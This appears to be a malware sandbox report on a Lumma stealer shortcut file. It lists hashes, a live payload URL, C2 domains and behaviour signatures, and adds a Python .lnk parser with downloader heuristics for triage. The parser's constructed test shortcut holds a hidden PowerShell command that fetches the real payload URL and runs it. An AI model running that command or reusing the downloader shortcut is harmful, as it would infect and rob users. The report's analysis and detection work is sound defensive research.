General
Target: 707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk
Size: 1KB
Sample: 240227-f2e8hahb85
MD5: c7945d1c593363055616d6e427b8e2a2
SHA1: 2c5f9b6fc746efb5caad3b31755c801f9ad1ac7b
SHA256: 707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50
SHA512: 7fb10ad46450b7ceeebdf3e9144447c59c22c67a6c7d026a1dbebcb665ee6bf1588958c5388e0358f18ecf71539dfd67050bb7ffeb516d2904d5cd77a1786d19
Static task: static1
Behavioral task: behavioral1
Sample: 707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk
Resource: win7-20240221-en
Malware Config
Extracted URL (reported twice by the sandbox; the .lnk is the only on-disk artifact, so this is the remote stage the shortcut reaches out to):
https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han
Extracted family: lumma
C2 endpoints (block at the host level; note the shared pattern of a freshly registered .shop domain with an /api path):
https://executivebrakeji.shop/api
https://technologyenterdo.shop/api
https://detectordiscusser.shop/api
https://turkeyunlikelyofw.shop/api
https://associationokeo.shop/api
Targets
Target: 707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk (1KB; MD5, SHA1, SHA256 and SHA512 as listed under General)
Signatures (behavioral1)
- Blocklisted process makes network request
- Downloads MZ/PE file
- Checks computer location settings: looks up the country code configured in the registry, likely a geofence (a mismatch with the sandbox locale is one reason a detonation can end early with no second stage)
- Executes dropped EXE
- Drops desktop.ini file(s)
- Suspicious use of SetThreadContext (setting another thread's context from outside the process is the usual mechanism behind process hollowing and similar injection; read together with "Executes dropped EXE")
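The signatures above describe a 1KB shortcut that contacts a blocklisted URL and then executes what it downloaded. The first thing a responder wants from such a sample is the command line the shortcut carries, which the MS-SHLLINK format stores as plain StringData right after the 76-byte header and the optional LinkTargetIDList/LinkInfo structures. The block below is an added example, not code from the report or from the sample: a minimal .lnk parser plus a downloader heuristic, run over a shortcut constructed inline. The report does not show this sample's real target or arguments, so the PowerShell command line, the relative path and the heuristic patterns are assumptions for illustration only.

```python
"""Minimal MS-SHLLINK (.lnk) parser plus downloader-style triage.

Added example, not code from the sandbox report or from the sample. It reads
the ShellLink header, skips the optional LinkTargetIDList and LinkInfo
structures, decodes the StringData fields, and flags command lines that look
like a LOLBin downloader. The shortcut bytes at the bottom are constructed;
the report does not show the real sample's command line.
"""
import re
import struct
import uuid

SHELL_LINK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
HEADER_SIZE = 0x4C
SW_SHOWMINNOACTIVE = 7  # ShowCommand value commonly used to keep the console out of sight

# LinkFlags bits, MS-SHLLINK section 2.1.1
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80

# StringData fields appear in exactly this order when their flag is set
STRING_FIELDS = [("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION)]

DOWNLOADER_HINTS = [  # (label, regex); heuristic patterns written for this example
    ("url", r"https?://\S+"),
    ("powershell", r"\b(powershell|pwsh)(\.exe)?\b"),
    ("lolbin", r"\b(mshta|certutil|bitsadmin|curl|rundll32|regsvr32)(\.exe)?\b"),
    ("hidden-window", r"-w(indowstyle)?\s+hidden"),
    ("encoded-command", r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}"),
    ("download-cmdlet", r"\b(iwr|invoke-webrequest|downloadfile|downloadstring|start-bitstransfer)\b"),
]


def parse_lnk(data):
    """Return header fields and StringData of a ShellLink blob, or raise ValueError."""
    if len(data) < HEADER_SIZE:
        raise ValueError("too short for a ShellLink header")
    header_size, clsid_le, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != HEADER_SIZE or uuid.UUID(bytes_le=clsid_le) != SHELL_LINK_CLSID:
        raise ValueError("not a ShellLink file")
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (u16) followed by the item IDs
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize (u32) includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    out = {"flags": flags, "show_command": show_command}
    for field, bit in STRING_FIELDS:
        if not flags & bit:
            out[field] = None
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + width * count]
        if len(raw) != width * count:
            raise ValueError("truncated StringData for %s" % field)
        pos += width * count
        out[field] = raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
    return out


def extract_urls(parsed):
    text = " ".join(v for v in parsed.values() if isinstance(v, str))
    return re.findall(r"https?://\S+", text, re.IGNORECASE)


def triage(parsed):
    """Labels of the downloader heuristics that fire on the decoded shortcut."""
    text = " ".join(v for v in parsed.values() if isinstance(v, str))
    hits = [label for label, pat in DOWNLOADER_HINTS if re.search(pat, text, re.IGNORECASE)]
    if parsed["show_command"] == SW_SHOWMINNOACTIVE:
        hits.append("minimized-window")
    return hits


def build_lnk(arguments, relative_path=None, unicode=True, show_command=1):
    """Constructed test vector: header + StringData only, no IDList/LinkInfo."""
    flags = HAS_ARGUMENTS | (IS_UNICODE if unicode else 0)
    if relative_path is not None:
        flags |= HAS_RELATIVE_PATH
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, SHELL_LINK_CLSID.bytes_le,
                         flags, 0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def string_data(s):
        raw = s.encode("utf-16-le") if unicode else s.encode("cp1252")
        return struct.pack("<H", len(s)) + raw

    body = string_data(relative_path) if relative_path is not None else b""
    return header + body + string_data(arguments)


# Constructed stand-in for a downloader shortcut (assumption): the report lists the
# Dropbox URL as extracted config but does not show the sample's own target or arguments.
SAMPLE_LNK = build_lnk(
    arguments=r'-w hidden -nop -c "iwr https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han -OutFile $env:TEMP\m.exe; Start-Process $env:TEMP\m.exe"',
    relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    show_command=SW_SHOWMINNOACTIVE,
)

if __name__ == "__main__":
    parsed = parse_lnk(SAMPLE_LNK)
    print("size:", len(SAMPLE_LNK), "bytes")
    print("target:", parsed["relative_path"])
    print("args:", parsed["arguments"])
    print("urls:", extract_urls(parsed))
    print("hints:", triage(parsed))
```

Real-world shortcuts almost always set HasLinkTargetIDList and HasLinkInfo; the parser skips both by their declared sizes, so the StringData offsets stay correct, and any ExtraData blocks after the strings are simply ignored. Because the constructed sample stays well under 1KB, it is a reminder that a shortcut of this size has no room for a payload of its own: everything interesting is in the arguments and in whatever the remote URL serves at detonation time.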
MITRE ATT&CK Enterprise v15
Privilege Escalation (1): Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.001), 1 matching signature